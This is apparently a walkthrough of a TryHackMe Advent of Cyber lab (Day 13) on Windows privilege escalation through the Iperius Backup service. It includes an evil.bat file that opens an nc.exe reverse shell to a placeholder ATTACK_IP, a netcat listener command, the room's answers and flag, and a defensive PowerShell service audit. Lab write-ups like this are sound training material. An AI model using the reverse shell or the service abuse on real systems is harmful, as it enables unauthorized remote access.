TryHackMe – Advent of Cyber 3 – Day 13

Day 13 – They Lost The Plan!

To complete Day 13’s challenges we’ll need to use the target machine AOC_WinPrivEsc. This will open a Windows VM that we can access in addition to the AttackBox to complete our tasks for the day…

Question 1

Complete the username: p…..

Boot the target machine AOC_WinPrivEsc and access a PowerShell terminal. Use the command ‘net users’ to pull up a list of users on the machine:

PowerShell 'net users' command.

Answer:

(Highlight below to see answer):

pepper

Question 2

What is the OS version?

You can use the systeminfo command to find information about the OS:

PowerShell systeminfo command.

Answer:

(Highlight below to see answer):

10.0.17763 N/A Build 17763

Question 3

What backup service did you find running on the system?

Use the ‘wmic service list’ command to display the running services. Go through the list until you find the backup service:

The 'wmic service list' command.

Alternatively, knowing that we are looking for a backup service, we can also use something like ‘wmic service list | findstr “Backup”’:

Piping 'wmic service list' into 'findstr'.

Answer:

(Highlight below to see answer):

IperiusSvc

Question 4

What is the path of the executable for the backup service you have identified?

The path can also be found in the information displayed from the ‘wmic service list’ command:

Using findstr with wmic service list.

Answer:

(Highlight below to see answer):

C:\Program Files (x86)\Iperius Backup\IperiusService.exe

Question 5

Run the whoami command on the connection you have received on your attacking machine. What user do you have?

Open notepad and save the following as evil.bat on the desktop of the target machine AOC_WinPrivEsc:

@echo off
C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 1337 -e cmd.exe

Contents of evil.bat

You’ll need to replace ATTACK_IP with the IP of your AttackBox. When you save, be sure to select a file type of ‘All Files’ (i.e. not .txt) so that the file will be recognized as a .bat file. If you save it as a .txt file, the .txt extension will be appended to the name and the attack will not work.

Start the Iperius Backup Service; you can do this by searching for it in the Start menu.

Click ‘Create New Backup’:

Create new backup

Select ‘Add Folder’:

Add folder.

Then enter the path C:\Users\McSkidy\Documents:

Selecting the 'Documents' folder.

Navigate one tab over to the ‘Destinations’ tab. This time select a Path of C:\Users\McSkidy\Desktop:

Selecting the Desktop path.

Navigate to the ‘Other Processes’ tab and select the ‘Run a program or external file:’ checkbox under ‘Before backup’. Select the evil.bat file:

Finish creating the backup.

Finish creating the backup and navigate to the AttackBox, where we’ll start a netcat listener using the command ‘nc -lvnp 1337’.

Setting up a netcat listener.

Now we’re ready to launch our attack! Navigate back to Iperius Backup Solutions on the target machine, right-click on the Backup job ‘Documents’, and select ‘Run backup as service’:

Run the backup as a service.

If you’ve done this correctly, you should receive a shell on your AttackBox. You can run the whoami command to determine the current user:

Return to the netcat listener to use shell.

Answer:

(Highlight below to see answer):

the-grinch-hack\thegrinch
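As an added audit example (not part of the TryHackMe room or the Iperius product), the following PowerShell surfaces the two properties that make a service like the one found in Questions 3 to 5 worth reviewing: its binary lives outside the Windows directory and it runs under a named user account rather than a built-in service identity. It assumes an elevated PowerShell session on the host being reviewed; the built-in account list and the path check are the script's own heuristics, not an Iperius or Windows API.

```powershell
# Added audit example, not from the room: list services whose executable sits
# outside the Windows directory AND which run as a named user account.
# Assumption: run from an elevated PowerShell session on the host under review.

# Built-in service identities; anything else is treated as a named user account
$builtinAccounts = @(
    'LocalSystem',
    'NT AUTHORITY\SYSTEM',
    'NT AUTHORITY\LocalService',
    'NT AUTHORITY\NetworkService'
)

function Get-ServiceExecutable {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments; keep only the executable
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

$findings = Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $exe = Get-ServiceExecutable -PathName $_.PathName
    [PSCustomObject]@{
        Name       = $_.Name
        State      = $_.State
        StartMode  = $_.StartMode
        Account    = $_.StartName
        Executable = $exe
        # Heuristic: third-party binary = not under %SystemRoot% (C:\Windows)
        ThirdParty = -not ($exe -like "$env:SystemRoot\*")
        # Heuristic: runs as a named user rather than a built-in identity
        NamedUser  = [bool]$_.StartName -and ($builtinAccounts -notcontains $_.StartName)
    }
} | Where-Object { $_.ThirdParty -and $_.NamedUser } | Sort-Object Name

# Each hit is a service whose "run a program" style features, if it has any,
# would execute under that named account; review its configuration and ACLs.
$findings | Format-Table Name, State, StartMode, Account, Executable -AutoSize
```

On the room's target this listing should include the backup service from Question 3 alongside its executable path from Question 4; a blank result means every service runs from C:\Windows or under a built-in identity.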

Question 6

What is the content of the flag.txt file?

Navigate to the Grinch’s user directory using the ‘cd’ command. Once inside, explore the directory for interesting files. The flag.txt file can be found in the Documents folder. List files using the ‘dir’ command:

Investigating the Documents folder.

Now we can use ‘type’ to print the contents of flag.txt:

Using the 'type' command in a Windows system to read file contents.

Answer:

(Highlight below to see answer):

THM-736635221

Question 7

The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?

The ‘Documents’ folder also contains a ‘Schedule.txt’, which we can again read using the ‘type’ command:

Using the 'type' command to read Schedule.txt.

Answer:

(Highlight below to see answer):

jazzercize